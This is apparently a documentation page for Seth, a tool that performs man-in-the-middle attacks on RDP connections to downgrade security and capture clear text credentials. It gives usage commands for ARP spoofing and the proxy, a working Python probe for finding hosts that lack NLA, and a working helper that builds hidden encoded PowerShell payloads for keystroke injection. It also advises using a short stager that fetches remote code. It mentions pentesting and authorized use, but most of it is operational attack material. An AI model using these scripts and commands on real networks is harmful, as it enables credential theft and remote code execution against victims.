Seth is a tool written in Python and Bash that performs man-in-the-middle attacks on RDP connections, attempting to downgrade the connection's security so that clear text credentials can be extracted.
Perform a MitM attack and extract clear text credentials from RDP connections
This tool is primarily used by penetration testers and red teamers to demonstrate the risk of improperly configured RDP deployments by intercepting the connection and extracting the credentials as the victim logs in. It is useful in security assessments, workshops and educational talks to raise awareness of RDP security weaknesses.
The attack depends on the RDP host not enforcing Network Level Authentication (NLA) and on the victim user clicking through the certificate warning that the intercepted connection produces; if either precondition fails, the downgrade has nothing to work with. Injecting a command via key press events (the optional COMMAND argument of seth.sh, -j of seth.py) is currently reliable only with the English US keyboard layout, and because the command is typed key by key, PowerShell encoded commands (powershell -enc ...) are recommended so that quoting and special characters do not get mangled. The attacker host must sit on the victim's layer 2 segment with IP forwarding enabled and ARP spoofing available (seth.sh runs the ARP spoofing for you), which in practice means running it as root.
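The first precondition above can be checked before any ARP spoofing is started. The following script is an added example and is not part of Seth: it sends a single X.224 Connection Request carrying an RDP_NEG_REQ that asks for TLS without NLA (or for standard RDP security), reads the Connection Confirm and reports whether the host accepted or answered RDP_NEG_FAILURE with HYBRID_REQUIRED_BY_SERVER. The structure layout follows MS-RDPBCGR; the sample server answers in the usage notes are constructed for illustration, not captured from a real host.

```python
"""Probe whether an RDP host accepts a connection without NLA.

Added example, not part of Seth. Only the X.224 connection phase of
MS-RDPBCGR is implemented: one Connection Request with an RDP_NEG_REQ,
one Connection Confirm carrying RDP_NEG_RSP or RDP_NEG_FAILURE.
"""
import socket
import struct
import sys

# requestedProtocols / selectedProtocol values (MS-RDPBCGR 2.2.1.1.1)
PROTOCOL_RDP = 0x00000000        # standard RDP security only
PROTOCOL_SSL = 0x00000001        # TLS without NLA
PROTOCOL_HYBRID = 0x00000002     # CredSSP, i.e. NLA
PROTOCOL_HYBRID_EX = 0x00000008  # CredSSP with early user authorization

TYPE_RDP_NEG_REQ = 0x01
TYPE_RDP_NEG_RSP = 0x02
TYPE_RDP_NEG_FAILURE = 0x03

FAILURE_CODES = {
    0x01: "SSL_REQUIRED_BY_SERVER",
    0x02: "SSL_NOT_ALLOWED_BY_SERVER",
    0x03: "SSL_CERT_NOT_ON_SERVER",
    0x04: "INCONSISTENT_FLAGS",
    0x05: "HYBRID_REQUIRED_BY_SERVER",
    0x06: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def build_connection_request(requested_protocols):
    """TPKT header + X.224 Connection Request + RDP_NEG_REQ (no routing cookie)."""
    # RDP_NEG_REQ: type, flags, length (always 8), requestedProtocols; little endian
    neg_req = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0, 8, requested_protocols)
    # X.224 CR TPDU after the length indicator: code 0xE0, DST-REF, SRC-REF, class 0
    body = b"\xe0" + b"\x00\x00" + b"\x00\x00" + b"\x00" + neg_req
    tpdu = bytes([len(body)]) + body
    # TPKT: version 3, reserved, total length in big endian
    return struct.pack(">BBH", 3, 0, 4 + len(tpdu)) + tpdu


def parse_connection_confirm(data):
    """Describe the server's answer: accepted (and which protocol) or why not."""
    if len(data) < 11 or data[0] != 3:
        raise ValueError("not a TPKT-framed X.224 PDU")
    if struct.unpack(">H", data[2:4])[0] != len(data):
        raise ValueError("TPKT length does not match the data")
    if data[5] != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    if len(data) < 19:
        # No rdpNegData at all: a legacy server that only speaks standard RDP security
        return {"accepted": True, "selected_protocol": PROTOCOL_RDP, "failure": None}
    ntype, _flags, length, value = struct.unpack("<BBHI", data[11:19])
    if length != 8:
        raise ValueError("bad RDP negotiation structure length")
    if ntype == TYPE_RDP_NEG_RSP:
        return {"accepted": True, "selected_protocol": value, "failure": None}
    if ntype == TYPE_RDP_NEG_FAILURE:
        return {"accepted": False, "selected_protocol": None,
                "failure": FAILURE_CODES.get(value, "0x%08x" % value)}
    raise ValueError("unexpected negotiation structure type 0x%02x" % ntype)


def nla_enforced(confirm):
    """True when the host refused a request that did not offer CredSSP.

    Meaningful only for a request built without PROTOCOL_HYBRID, such as the
    ones probe() sends; other failure codes are configuration errors, not NLA.
    """
    return (not confirm["accepted"]) and confirm["failure"] in (
        "HYBRID_REQUIRED_BY_SERVER",
        "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
    )


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed during negotiation")
        buf += chunk
    return buf


def probe(host, port=3389, requested=PROTOCOL_SSL, timeout=5.0):
    """Send one negotiation request and return the parsed Connection Confirm."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connection_request(requested))
        header = _recv_exact(sock, 4)
        total = struct.unpack(">H", header[2:4])[0]
        return parse_connection_confirm(header + _recv_exact(sock, total - 4))


if __name__ == "__main__":
    target = sys.argv[1]  # assumed: an RDP host you are authorized to test
    for label, req in (("TLS without NLA", PROTOCOL_SSL),
                       ("standard RDP security", PROTOCOL_RDP)):
        result = probe(target, requested=req)
        verdict = "NLA enforced" if nla_enforced(result) else "NLA not enforced"
        print("%-22s %s  -> %s" % (label, result, verdict))
```

A host that answers the TLS-without-NLA request with RDP_NEG_FAILURE / HYBRID_REQUIRED_BY_SERVER is not a candidate for Seth's downgrade; one that answers RDP_NEG_RSP selecting PROTOCOL_SSL or PROTOCOL_RDP, or with no negotiation structure at all, is. Probing for PROTOCOL_RDP separately tells you whether the host will also accept standard RDP security, which is the weakest of the three.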
Clone the repository from GitHub
Ensure Python and Bash are installed on your system
Make the seth.sh script executable (chmod +x seth.sh)
Prepare a TLS certificate and private key in PEM format for the RDP proxy; a self-signed pair is sufficient, since the attack assumes the user clicks through the certificate warning anyway
Run the tool with appropriate network interface and IP parameters
./seth.sh <INTERFACE> <ATTACKER IP> <VICTIM IP> <GATEWAY IP|HOST IP> [<COMMAND>]
Starts ARP spoofing between the victim and the gateway (or the RDP host itself when it is on the same subnet) together with the RDP proxy that intercepts the credentials; the optional COMMAND is injected into the victim's session on the RDP host via key press events.
seth.py -h
Displays help and usage information for the Python proxy script.
seth.py -d -f -p 3389 -b 0.0.0.0 -g 3 -j calc -c cert.pem -k key.pem target_host
Runs the Python proxy against target_host with debug output (-d), a 'fake server' attack (-f), listening on TCP port 3389 (-p) on all local addresses (-b 0.0.0.0), authentication downgrade level 3 (-g, the default), the command calc injected via key press events (-j), and the given certificate and key files (-c, -k).
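The -j calc example works because "calc" is plain ASCII. For anything with quotes, pipes or a path, the recommendation above is to hand Seth a PowerShell encoded command instead. The helper below is an added example, not part of Seth: it turns an arbitrary PowerShell command into the base64 of its UTF-16LE encoding, wraps it in the usual powershell -nop -w hidden -enc prefix, refuses any payload that would contain characters outside letters, digits and the base64 symbols (a constructed safe set for this example, chosen because those keys exist on the English US layout the injection supports), and quotes the result for a POSIX shell invocation of seth.py. The target host and file names in the usage note are placeholders.

```python
"""Build an encoded PowerShell payload for Seth's -j / COMMAND injection.

Added example, not part of Seth. The -j string is typed into the session
via key press events, so the injected text should contain only characters
that map cleanly on the English US layout.
"""
import base64
import shlex
import string

# Constructed for this example: characters we are willing to have typed.
# Base64 output never leaves this set, and the prefix adds only spaces and hyphens.
SAFE_CHARS = set(string.ascii_letters + string.digits + "+/= -")


def encode_powershell(command):
    """UTF-16LE then base64, the form powershell.exe -EncodedCommand expects."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def injection_payload(command, hidden=True):
    """Full string to pass as seth.py -j (or the COMMAND argument of seth.sh)."""
    parts = ["powershell", "-nop"]          # -NoProfile
    if hidden:
        parts += ["-w", "hidden"]           # -WindowStyle Hidden
    parts += ["-enc", encode_powershell(command)]
    payload = " ".join(parts)
    unsafe = sorted(set(payload) - SAFE_CHARS)
    if unsafe:
        raise ValueError("payload contains characters unsafe for key injection: %r" % unsafe)
    return payload


def seth_command_line(target_host, certfile, keyfile, command):
    """seth.py invocation with the payload quoted for a POSIX shell.

    Mirrors the documented usage: -c CERTFILE -k KEYFILE -j INJECT target_host.
    """
    return "seth.py -c %s -k %s -j %s %s" % (
        shlex.quote(certfile),
        shlex.quote(keyfile),
        shlex.quote(injection_payload(command)),
        shlex.quote(target_host),
    )


if __name__ == "__main__":
    # Placeholder host and file names; the command writes a marker file in the session's TEMP.
    print(seth_command_line("10.0.0.5", "cert.pem", "key.pem",
                            'Set-Content -Path "$env:TEMP\\seth.txt" -Value "injected"'))
```

Every character of the base64 body has to be delivered as a separate key press, so a long script makes the injection slow and fragile; keep the encoded command to a short stager that fetches the rest, rather than embedding a large script in -j.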